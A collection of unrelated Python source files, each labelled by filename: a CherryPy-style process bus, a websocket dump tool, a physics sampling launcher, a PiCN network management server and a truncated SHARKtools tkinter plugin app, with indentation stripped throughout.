# new process. This is a defense against the application having changed the
# current working directory (which could make sys.executable "not found" if
# sys.executable is a relative-path, and/or cause other problems).
_startup_cwd = os.getcwd()
class ChannelFailures(Exception):
"""Exception raised during errors on Bus.publish()."""
delimiter = '\n'
def __init__(self, *args, **kwargs):
"""Initialize ChannelFailures errors wrapper."""
super(ChannelFailures, self).__init__(*args, **kwargs)
self._exceptions = list()
def handle_exception(self):
"""Append the current exception to self."""
self._exceptions.append(sys.exc_info()[1])
def get_instances(self):
"""Return a list of seen exception instances."""
return self._exceptions[:]
def __str__(self):
"""Render the list of errors, which happened in channel."""
exception_strings = map(repr, self.get_instances())
return self.delimiter.join(exception_strings)
__repr__ = __str__
def __bool__(self):
"""Determine whether any error happened in channel."""
return bool(self._exceptions)
__nonzero__ = __bool__
# Use a flag to indicate the state of the bus.
class _StateEnum(object):
class State(object):
name = None
def __repr__(self):
return 'states.%s' % self.name
def __setattr__(self, key, value):
if isinstance(value, self.State):
value.name = key
object.__setattr__(self, key, value)
states = _StateEnum()
states.STOPPED = states.State()
states.STARTING = states.State()
states.STARTED = states.State()
states.STOPPING = states.State()
states.EXITING = states.State()
try:
import fcntl
except ImportError:
max_files = 0
else:
try:
max_files = os.sysconf('SC_OPEN_MAX')
except AttributeError:
max_files = 1024
class Bus(object):
"""Process state-machine and messenger for HTTP site deployment.
All listeners for a given channel are guaranteed to be called even
if others at the same channel fail. Each failure is logged, but
execution proceeds on to the next listener. The only way to stop all
processing from inside a listener is to raise SystemExit and stop the
whole server.
"""
states = states
state = states.STOPPED
execv = False
max_cloexec_files = max_files
def __init__(self):
"""Initialize pub/sub bus."""
self.execv = False
self.state = states.STOPPED
channels = 'start', 'stop', 'exit', 'graceful', 'log', 'main'
self.listeners = dict(
(channel, set())
for channel in channels
)
self._priorities = {}
def subscribe(self, channel, callback=None, priority=None):
"""Add the given callback at the given channel (if not present).
If callback is None, return a partial suitable for decorating
the callback.
"""
if callback is None:
return functools.partial(
self.subscribe,
channel,
priority=priority,
)
ch_listeners = self.listeners.setdefault(channel, set())
ch_listeners.add(callback)
if priority is None:
priority = getattr(callback, 'priority', 50)
self._priorities[(channel, callback)] = priority
def unsubscribe(self, channel, callback):
"""Discard the given callback (if present)."""
listeners = self.listeners.get(channel)
if listeners and callback in listeners:
listeners.discard(callback)
del self._priorities[(channel, callback)]
def publish(self, channel, *args, **kwargs):
"""Return output of all subscribers for the given channel."""
if channel not in self.listeners:
return []
exc = ChannelFailures()
output = []
raw_items = (
(self._priorities[(channel, listener)], listener)
for listener in self.listeners[channel]
)
items = sorted(raw_items, key=operator.itemgetter(0))
for priority, listener in items:
try:
output.append(listener(*args, **kwargs))
except KeyboardInterrupt:
raise
except SystemExit:
e = sys.exc_info()[1]
# If we have previous errors ensure the exit code is non-zero
if exc and e.code == 0:
e.code = 1
raise
except Exception:
exc.handle_exception()
if channel == 'log':
# Assume any further messages to 'log' will fail.
pass
else:
self.log('Error in %r listener %r' % (channel, listener),
level=40, traceback=True)
if exc:
raise exc
return output
def _clean_exit(self):
"""Assert that the Bus is not running in atexit handler callback."""
if self.state != states.EXITING:
warnings.warn(
'The main thread is exiting, but the Bus is in the %r state; '
'shutting it down automatically now. You must either call '
'bus.block() after start(), or call bus.exit() before the '
'main thread exits.' % self.state, RuntimeWarning)
self.exit()
def start(self):
"""Start all services."""
atexit.register(self._clean_exit)
self.state = states.STARTING
self.log('Bus STARTING')
try:
self.publish('start')
self.state = states.STARTED
self.log('Bus STARTED')
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.log('Shutting down due to error in start listener:',
level=40, traceback=True)
e_info = sys.exc_info()[1]
try:
self.exit()
except Exception:
# Any stop/exit errors will be logged inside publish().
pass
# Re-raise the original error
raise e_info
def exit(self):
"""Stop all services and prepare to exit the process."""
exitstate = self.state
EX_SOFTWARE = 70
try:
self.stop()
self.state = states.EXITING
self.log('Bus EXITING')
self.publish('exit')
# This isn't strictly necessary, but it's better than seeing
# "Waiting for child threads to terminate..." and then nothing.
self.log('Bus EXITED')
except Exception:
# This method is often called asynchronously (whether thread,
# signal handler, console handler, or atexit handler), so we
# can't just let exceptions propagate out unhandled.
# Assume it's been logged and just die.
os._exit(EX_SOFTWARE)
if exitstate == states.STARTING:
# exit() was called before start() finished, possibly due to
# Ctrl-C because a start listener got stuck. In this case,
# we could get stuck in a loop where Ctrl-C never exits the
# process, so we just call os.exit here.
os._exit(EX_SOFTWARE)
def restart(self):
"""Restart the process (may close connections).
This method does not restart the process from the calling thread;
instead, it stops the bus and asks the main thread to call execv.
"""
self.execv = True
self.exit()
def graceful(self):
"""Advise all services to reload."""
self.log('Bus graceful')
self.publish('graceful')
def block(self, interval=0.1):
"""Wait for the EXITING state, KeyboardInterrupt or SystemExit.
This function is intended to be called only by the main thread.
After waiting for the EXITING state, it also waits for all threads
to terminate, and then calls os.execv if self.execv is True. This
design allows another thread to call bus.restart, yet have the main
thread perform the actual execv call (required on some platforms).
"""
try:
self.wait(states.EXITING, interval=interval, channel='main')
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.log('Keyboard Interrupt: shutting down bus')
self.exit()
except SystemExit:
self.log('SystemExit raised: shutting down bus')
self.exit()
raise
# Waiting for ALL child threads to finish is necessary on OS X.
# See https://github.com/cherrypy/cherrypy/issues/581.
# It's also good to let them all shut down before allowing
# the main thread to call atexit handlers.
# See https://github.com/cherrypy/cherrypy/issues/751.
self.log('Waiting for child threads to terminate...')
for t in threading.enumerate():
# Validate the we're not trying to join the MainThread
# that will cause a deadlock and the case exist when
# implemented as a windows service and in any other case
# that another thread executes cherrypy.engine.exit()
if (
t != threading.currentThread() and
not isinstance(t, threading._MainThread) and
# Note that any dummy (external) threads are
# always daemonic.
not t.daemon
):
self.log('Waiting for thread %s.' % t.getName())
t.join()
if self.execv:
self._do_execv()
def wait(self, state, interval=0.1, channel=None):
"""Poll for the given state(s) at intervals; publish to channel."""
if isinstance(state, (tuple, list)):
states = state
else:
states = [state]
while self.state not in states:
time.sleep(interval)
self.publish(channel)
def _do_execv(self):
"""Re-execute the current process.
This must be called from the main thread, because certain platforms
(OS X) don't allow execv to be called in a child thread very well.
"""
try:
args = self._get_true_argv()
except NotImplementedError:
"""It's probably win32 or GAE"""
args = [sys.executable] + self._get_interpreter_argv() + sys.argv
self.log('Re-spawning %s' % ' '.join(args))
self._extend_pythonpath(os.environ)
if sys.platform[:4] == 'java':
from _systemrestart import SystemRestart
raise SystemRestart
else:
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
if self.max_cloexec_files:
self._set_cloexec()
os.execv(sys.executable, args)
@staticmethod
def _get_interpreter_argv():
"""Retrieve current Python interpreter's arguments.
Returns empty tuple in case of frozen mode, uses built-in arguments
reproduction function otherwise.
Frozen mode is possible for the app has been packaged into a binary
executable using py2exe. In this case the interpreter's arguments are
already built-in into that executable.
:seealso: https://github.com/cherrypy/cherrypy/issues/1526
Ref: https://pythonhosted.org/PyInstaller/runtime-information.html
"""
return ([]
if getattr(sys, 'frozen', False)
else subprocess._args_from_interpreter_flags())
@staticmethod
def _get_true_argv():
"""Retrieve all real arguments of the python interpreter.
...even those not listed in ``sys.argv``
:seealso: http://stackoverflow.com/a/28338254/595220
:seealso: http://stackoverflow.com/a/6683222/595220
:seealso: http://stackoverflow.com/a/28414807/595220
"""
try:
char_p = ctypes.c_char_p if six.PY2 else ctypes.c_wchar_p
argv = ctypes.POINTER(char_p)()
argc = ctypes.c_int()
ctypes.pythonapi.Py_GetArgcArgv(
ctypes.byref(argc),
ctypes.byref(argv),
)
_argv = argv[:argc.value]
# The code below is trying to correctly handle special cases.
# `-c`'s argument interpreted by Python itself becomes `-c` as
# well. Same applies to `-m`. This snippet is trying to survive
# at least the case with `-m`
# Ref: https://github.com/cherrypy/cherrypy/issues/1545
# Ref: python/cpython@418baf9
argv_len, is_command, is_module = len(_argv), False, False
try:
m_ind = _argv.index('-m')
if m_ind < argv_len - 1 and _argv[m_ind + 1] in ('-c', '-m'):
"""
In some older Python versions `-m`'s argument may be
substituted with `-c`, not `-m`
"""
is_module = True
except (IndexError, ValueError):
m_ind = None
try:
c_ind = _argv.index('-c')
if c_ind < argv_len - 1 and _argv[c_ind + 1] == '-c':
is_command = True
except (IndexError, ValueError):
c_ind = None
if is_module:
"""It's containing `-m -m` sequence of arguments"""
if is_command and c_ind < m_ind:
"""There's `-c -c` before `-m`"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. Ref: "
'https://github.com/cherrypy/cherrypy/issues/1545')
# Survive module argument here
original_module = sys.argv[0]
if not os.access(original_module, os.R_OK):
"""There's no such module exist"""
raise AttributeError(
"{} doesn't seem to be a module "
'accessible by current user'.format(original_module))
del _argv[m_ind:m_ind + 2] # remove `-m -m`
# ... and substitute it with the original module path:
_argv.insert(m_ind, original_module)
elif is_command:
"""It's containing just `-c -c` sequence of arguments"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. "
'Ref: https://github.com/cherrypy/cherrypy/issues/1545')
except AttributeError:
"""It looks Py_GetArgcArgv is completely absent in some environments
It is known, that there's no Py_GetArgcArgv in MS Windows and
``ctypes`` module is completely absent in Google AppEngine
:seealso: https://github.com/cherrypy/cherrypy/issues/1506
:seealso: https://github.com/cherrypy/cherrypy/issues/1512
:ref: http://bit.ly/2gK6bXK
"""
raise NotImplementedError
else:
return _argv
@staticmethod
def _extend_pythonpath(env):
"""Prepend current working dir to PATH environment variable if needed.
If sys.path[0] is an empty string, the interpreter was likely
invoked with -m and the effective path is about to change on
re-exec. Add the current directory to $PYTHONPATH to ensure
that the new process sees the same path.
This issue cannot be addressed in the general case because
Python cannot reliably reconstruct the
original command line (http://bugs.python.org/issue14208).
(This idea filched from tornado.autoreload)
"""
path_prefix = '.' + os.pathsep
existing_path = env.get('PYTHONPATH', '')
needs_patch = (
sys.path[0] == '' and
not existing_path.startswith(path_prefix)
)
if needs_patch:
env['PYTHONPATH'] = path_prefix + existing_path
def _set_cloexec(self):
"""Set the CLOEXEC flag on all open files (except stdin/out/err).
If self.max_cloexec_files is an integer (the default), then on
platforms which support it, it represents the max open files setting
for the operating system. This function will be called just before
the process is restarted via os.execv() to prevent open files
from persisting into the new process.
Set self.max_cloexec_files to 0 to disable this behavior.
"""
for fd in range(3, self.max_cloexec_files): # skip stdin/out/err
try:
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
except IOError:
continue
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
def stop(self):
"""Stop all services."""
self.state = states.STOPPING
self.log('Bus STOPPING')
self.publish('stop')
self.state = states.STOPPED
self.log('Bus STOPPED')
def start_with_callback(self, func, args=None, kwargs=None):
"""Start 'func' in a new thread T, then start self (and return T)."""
if args is None:
args = ()
if kwargs is None:
kwargs = {}
args = (func,) + args
def _callback(func, *a, **kw):
self.wait(states.STARTED)
func(*a, **kw)
t = threading.Thread(target=_callback, args=args, kwargs=kwargs)
t.setName('Bus Callback ' + t.getName())
t.start()
self.start()
return t
def log(self, msg='', level=20, traceback=False):
"""Log the given message. Append the last traceback if requested."""
if traceback:
msg += '\n' + ''.join(_traceback.format_exception(*sys.exc_info()))
self.publish('log', msg, level)
bus = Bus()
|
wsdump.py
|
#!/Users/tgins/Documents/PythonScripts/Book_Recommendations_App/virtual_env/bin/python2.7
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
run_multithread_sampling_iS3D.py
|
import csv
import os
import sys
from multiprocessing import Process, current_process
import datetime as dt
import time
print("### Starting multithread sampling routine ###")
start_time = time.time()
#number of samples
nsamples = int(sys.argv[1])
print("Number of samples : " + str(nsamples) )
#number of cores reading the same freezeout surface
ncores = int(sys.argv[2])
print("Cores available : " + str(ncores) )
def spawn_sampler(sample):
sample_dir = "sample_" + str(sample)
os.system( 'mkdir ' + sample_dir )
os.chdir( sample_dir )
#link necessary input files to current working dir
os.system( 'ln -s ../input input' )
os.system( 'ln -s ../iS3D_parameters.dat iS3D_parameters.dat' )
os.system( 'ln -s ../tables tables' )
os.system( 'ln -s ../deltaf_coefficients deltaf_coefficients' )
os.system( 'ln -s ../PDG PDG' )
os.system( 'ln -s ../iS3D.e iS3D.e' )
#run the sampler
os.system( 'mkdir results' )
os.system( './iS3D.e' )
#return to parent dir
os.chdir( ".." )
num_launches = (nsamples / ncores) + 1
#spawn the jobs
for launch in range(0, num_launches):
if __name__ == '__main__':
worker_count = ncores
worker_pool = []
for core in range(worker_count):
sample = launch * ncores + core
p = Process( target = spawn_sampler, args = (sample,) )
p.start()
worker_pool.append(p)
for p in worker_pool:
p.join()
print("Oversampling routine finished in " + str( time.time() - start_time) + " sec")
print("Goodbye!")
|
Mgmt.py
|
"""Mgmt System for PiCN"""
import multiprocessing
import os
import select
import socket
import time
from typing import Dict
from PiCN.Layers.ICNLayer.ContentStore import BaseContentStore
from PiCN.Layers.ICNLayer.ForwardingInformationBase import BaseForwardingInformationBase
from PiCN.Layers.ICNLayer.PendingInterestTable import BasePendingInterestTable
from PiCN.Packets import Content, Name
from PiCN.Processes import LayerProcess
from PiCN.Processes import PiCNProcess
from PiCN.Layers.LinkLayer.Interfaces import AddressInfo, BaseInterface, UDP4Interface
class Mgmt(PiCNProcess):
"""Mgmt System for PiCN"""
def __init__(self, cs: BaseContentStore, fib: BaseForwardingInformationBase, pit: BasePendingInterestTable,
linklayer: LayerProcess, port: int, shutdown=None,
repo_prfx: str = None, repo_path: str = None, log_level=255):
super().__init__("MgmtSys", log_level)
self.cs = cs
self.fib = fib
self.pit = pit
self._linklayer = linklayer
self._repo_prfx = repo_prfx
self._repo_path = repo_path
self._port: int = port
# init MGMT
self.mgmt_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.mgmt_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.mgmt_sock.bind(("127.0.0.1", self._port))
self.mgmt_sock.listen(5)
self._buffersize = 8192
if os.name is not 'nt':
self.shutdown = shutdown # function pointer
else:
self.logger.critical("Shutdown not available on NT platform")
def mgmt(self, mgmt_sock):
"""parse mgmt message"""
replysock, addr = mgmt_sock.accept()
try:
# receive data
data = replysock.recv(self._buffersize)
request_string = data.decode()
# Parse HTTP
fields = request_string.split("\r\n")
request: str = fields[0]
fields = fields[1:]
type, name = request.split(" ", 1)
httpversion = request.rsplit(" ", 1)[-1]
http = {}
for field in fields:
if (len(field.split(":")) == 2):
key, value = field.split(':', 1)
http[key] = value
# Execute MGMT
name = name.replace(" HTTP/1.1", "")
mgmt_request = name.split("/")
if (len(mgmt_request) == 4):
layer = mgmt_request[1]
command = mgmt_request[2]
params = mgmt_request[3]
if (layer == "linklayer"):
self.ll_mgmt(command, params, replysock)
elif(layer == "icnlayer"):
self.icnl_mgmt(command, params, replysock)
elif(layer == "repolayer"):
self.repol_mgmt(command, params, replysock)
elif len(mgmt_request) == 2:
if mgmt_request[1] == "shutdown":
self.logger.info("Shutdown")
replysock.send("HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n shutdown\r\n".encode())
replysock.close()
time.sleep(2)
self.shutdown()
finally:
replysock.close()
def ll_mgmt(self, command, params, replysock):
# newface expects /linklayer/newface/ip:port
if (command == "newface"):
ip, port, if_num = params.split(":", 2)
if port != 'None':
port = int(port)
if_num = int(if_num)
if if_num >= len(self._linklayer.interfaces):
replysock.send(f"Interface Number {if_num} does not exit on node".encode())
return
if port != 'None':
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo((ip, port), if_num))
else:
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo(ip, if_num))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newface OK:" + str(fid) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Face added " + ip + "|" + str(port) + ", FaceID: " + str(fid))
else:
self.unknown_command(replysock)
return
def icnl_mgmt(self, command, params, replysock):
if(self.cs == None or self.fib == None or
self.pit== None):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Forwarder OK\r\n"
replysock.send(reply.encode())
# newface expects /linklayer/newface/ip:port
elif (command == "newforwardingrule"):
prefix, faceid = params.split(":", 1)
faceid_str = faceid
faceid = faceid.split(',')
faceid = list(map(lambda x: int(x), faceid))
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
self.fib.add_fib_entry(name, faceid, True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newforwardingrule OK:" + str(faceid_str) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Forwardingrule added " + prefix + "|" + str(faceid))
return
elif(command == "newcontent"):
prefix, content = params.split(":", 1)
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
content = Content(name, content)
self.cs.add_content_object(content, static=True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newcontent OK\r\n"
replysock.send(reply.encode())
self.logger.info("New content added " + prefix + "|" + content.content)
return
else:
self.unknown_command(replysock)
return
def repol_mgmt(self, command, params, replysock):
if(self._repo_path == None or self._repo_prfx == None):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Repo OK\r\n"
replysock.send(reply.encode())
elif(command == "getprefix"):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(self._repo_prfx) + " OK\r\n"
replysock.send(reply.encode())
elif(command =="getpath"):
abs_path = os.path.abspath(str(self._repo_path))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(abs_path) + " OK\r\n"
replysock.send(reply.encode())
else:
self.unknown_command(replysock)
return
def unknown_command(self, replysock):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Unknown Command\r\n"
replysock.send(reply.encode())
def _run_select(self, mgmt_sock):
while True:
socks = [mgmt_sock]
ready_vars, _, _ = select.select(socks, [], [])
self.mgmt(mgmt_sock)
def _run_poll(self, mgmt_sock):
poller = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
poller.register(mgmt_sock, READ_ONLY)
while True:
ready_vars = poller.poll()
self.mgmt(mgmt_sock)
def _run(self, mgmt_sock):
if os.name is 'nt':
self._run_select(mgmt_sock)
else:
self._run_poll(mgmt_sock)
def start_process(self):
self._process = multiprocessing.Process(target=self._run, args=[self.mgmt_sock])
self._process.start()
def stop_process(self):
if self._process is not None:
self._process.terminate()
self._process = None
self.mgmt_sock.close()
def __del__(self):
try:
self.mgmt_sock.close()
except:
pass
|
app.py
|
# Copyright (c) 2018 SMHI, Swedish Meteorological and Hydrological Institute
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
# To use basemap you might need to install Microsoft Visual C++: https://visualstudio.microsoft.com/visual-cpp-build-tools/
import os
import threading
import tkinter as tk
from tkinter import filedialog
from tkinter import ttk
import matplotlib.pyplot as plt
import sharkpylib as spl
import sharkpylib.tklib.tkinter_widgets as tkw
from sharkpylib import gismo
from sharkpylib.file.file_handlers import SamplingTypeSettingsDirectory, MappingDirectory
from sharkpylib.gismo.exceptions import *
import core
import gui as main_gui
from plugins.SHARKtools_qc_sensors import gui
from plugins.plugin_app import PluginApp
ALL_PAGES = dict()
ALL_PAGES['PageStart'] = gui.PageStart
ALL_PAGES['PageTimeSeries'] = gui.PageTimeSeries
ALL_PAGES['PageMetadata'] = gui.PageMetadata
ALL_PAGES['PageProfile'] = gui.PageProfile
ALL_PAGES['PageSamplingTypeSettings'] = gui.PageSamplingTypeSettings
ALL_PAGES['PageUser'] = gui.PageUser
APP_TO_PAGE = dict()
for page_name, page in ALL_PAGES.items():
APP_TO_PAGE[page] = page_name
class App(PluginApp):
"""
This class contains the main window (page), "container", for
the SHARKtools application.
Additional pages in the application are stored under self.frames.
The container is the parent frame that is passed to other pages.
self is also passed to the other pages objects and should there be given the name
"self.main_app".
Toolbox settings and logfile can be reached in all page objects by calling
"self.main_app.settings" and "self.main_app.logfile" respectivly.
"""
#===========================================================================
def __init__(self, parent, main_app, **kwargs):
PluginApp.__init__(self, parent, main_app, **kwargs)
# parent is the frame "container" in App. contoller is the App class
self.parent = parent
self.main_app = main_app
self.version = '2019.01.1'
# TODO: Move version to __version__
self.info_popup = self.main_app.info_popup
self.logger = self.main_app.logger
self.plugin_directory = os.path.dirname(os.path.abspath(__file__))
self.root_directory = self.main_app.root_directory
self.users_directory = self.main_app.users_directory
# def get_user_settings(self):
# return [('basic', 'test_setting')]
def startup(self):
"""
Updated 20181002
"""
self.sampling_types_factory = gismo.sampling_types.PluginFactory()
self.qc_routines_factory = gismo.qc_routines.PluginFactory()
# Setting upp GUI logger
if not os.path.exists(self.log_directory):
os.makedirs(self.log_directory)
self.logger = self.main_app.logger
# Load settings files object
self.settings_files = SamplingTypeSettingsDirectory()
self.mapping_files = MappingDirectory()
# self.settings = self.main_app.settings
self.user_manager = self.main_app.user_manager
self.user = self.main_app.user
self.session = spl.gismo.GISMOsession(root_directory=self.root_directory,
users_directory=self.users_directory,
log_directory=self.log_directory,
user=self.user.name,
sampling_types_factory=self.sampling_types_factory,
qc_routines_factory=self.qc_routines_factory,
save_pkl=False)
self.default_platform_settings = None
self._create_titles()
self.all_ok = True
self.active_page = None
self.previous_page = None
self.admin_mode = False
self.progress_running = False
self.progress_running_toplevel = False
self.latest_loaded_sampling_type = ''
self._set_frame()
self.startup_pages()
# Show start page given in settings.ini
self.page_history = ['PageUser']
self.show_frame('PageStart')
def update_page(self):
self.user = self.user_manager.user
default_plot_style = self.user_manager.get_app_settings('default', 'plot style', 'seaborn')
plt.style.use(self.user.layout.setdefault('plotstyle', self.user.layout.setdefault('plotstyle',
default_plot_style)))
self.update_all()
#==========================================================================
def _set_frame(self):
self.frame_top = tk.Frame(self)
self.frame_mid = tk.Frame(self)
self.frame_bot = tk.Frame(self)
# Grid
self.frame_top.grid(row=0, column=0, sticky="nsew")
self.frame_mid.grid(row=1, column=0, sticky="nsew")
self.frame_bot.grid(row=2, column=0, sticky="nsew")
# Gridconfigure
tkw.grid_configure(self, nr_rows=3, r0=100, r1=5, r2=1)
#----------------------------------------------------------------------
# Frame top
# Create container in that will hold (show) all frames
self.container = tk.Frame(self.frame_top)
self.container = tk.Frame(self.frame_top)
self.container.grid(row=0, column=0, sticky="nsew")
tkw.grid_configure(self.frame_top)
#----------------------------------------------------------------------
# Frame mid
self.frame_add = tk.LabelFrame(self.frame_mid)
self.frame_loaded = tk.LabelFrame(self.frame_mid, text='Loaded files')
# Grid
self.frame_add.grid(row=0, column=0, sticky="nsew")
self.frame_loaded.grid(row=0, column=1, sticky="nsew")
# Gridconfigure
tkw.grid_configure(self.frame_mid, nr_columns=2)
#----------------------------------------------------------------------
# Frame bot
self._set_frame_bot()
self._set_frame_add_file()
self._set_frame_loaded_files()
def _set_frame_bot(self):
self.frame_info = tk.Frame(self.frame_bot)
self.frame_info.grid(row=0, column=0, sticky="nsew")
self.frame_progress = tk.Frame(self.frame_bot)
self.progress_widget = tkw.ProgressbarWidget(self.frame_progress, sticky='nsew')
# self.info_widget = tkw.LabelFrameLabel(self.frame_info, pack=False)
tkw.grid_configure(self.frame_info)
tkw.grid_configure(self.frame_bot)
def run_progress(self, run_function, message=''):
def run_thread():
self.progress_widget.run_progress(run_function, message=message)
if self.progress_running:
main_gui.show_information('Progress is running', 'A progress is running, please wait until it is finished!')
return
self.progress_running = True
# run_thread = lambda: self.progress_widget.run_progress(run_function, message=message)
threading.Thread(target=run_thread).start()
self.progress_running = False
def run_progress_in_toplevel(self, run_function, message=''):
"""
Rins progress in a toplevel window.
:param run_function:
:param message:
:return:
"""
def run_thread():
self.frame_toplevel_progress = tk.Toplevel(self)
self.progress_widget_toplevel = tkw.ProgressbarWidget(self.frame_toplevel_progress, sticky='nsew', in_rows=True)
self.frame_toplevel_progress.update_idletasks()
self.progress_widget_toplevel.update_idletasks()
self.progress_widget.run_progress(run_function, message=message)
self.frame_toplevel_progress.destroy()
if self.progress_running_toplevel:
self.main_app.show_information('Progress is running', 'A progress is running, please wait until it is finished!')
return
self.progress_running = True
# run_thread = lambda: self.progress_widget.run_progress(run_function, message=message)
threading.Thread(target=run_thread).start()
self.progress_running = False
#===========================================================================
def startup_pages(self):
self.pages_started = dict()
self.frames = {}
# Looping all pages to make them active.
for page_name, Page in ALL_PAGES.items(): # Capital P to emphasize class
# Destroy old page if called as an update
try:
self.frames[page_name].destroy()
print(Page, u'Destroyed')
except:
pass
frame = Page(self.container, self)
frame.grid(row=0, column=0, sticky="nsew")
self.container.rowconfigure(0, weight=1)
self.container.columnconfigure(0, weight=1)
self.frames[page_name] = frame
self.activate_binding_keys()
def _set_load_frame(self):
self._set_frame_add_file()
self._set_frame_loaded_files()
def _set_frame_add_file(self):
# Three main frames
frame = self.frame_add
frame_data = tk.LabelFrame(frame, text='Get data file')
frame_settings = tk.LabelFrame(frame, text='Settings file')
frame_sampling_type = tk.LabelFrame(frame, text='Sampling type')
frame_platform_depth = tk.LabelFrame(frame, text='Platform depth')
frame_load = tk.Frame(frame)
# Grid
padx=5
pady=5
frame_data.grid(row=0, column=0, columnspan=4, sticky='nsew', padx=padx, pady=pady)
frame_settings.grid(row=1, column=0, sticky='nsew', padx=padx, pady=pady)
frame_sampling_type.grid(row=1, column=1, sticky='nsew', padx=padx, pady=pady)
frame_platform_depth.grid(row=1, column=2, sticky='nsew', padx=padx, pady=pady)
frame_load.grid(row=1, column=3, sticky='nsew', padx=padx, pady=pady)
# Gridconfigure
tkw.grid_configure(frame, nr_rows=2, nr_columns=4, r0=50)
#----------------------------------------------------------------------
# Data frame
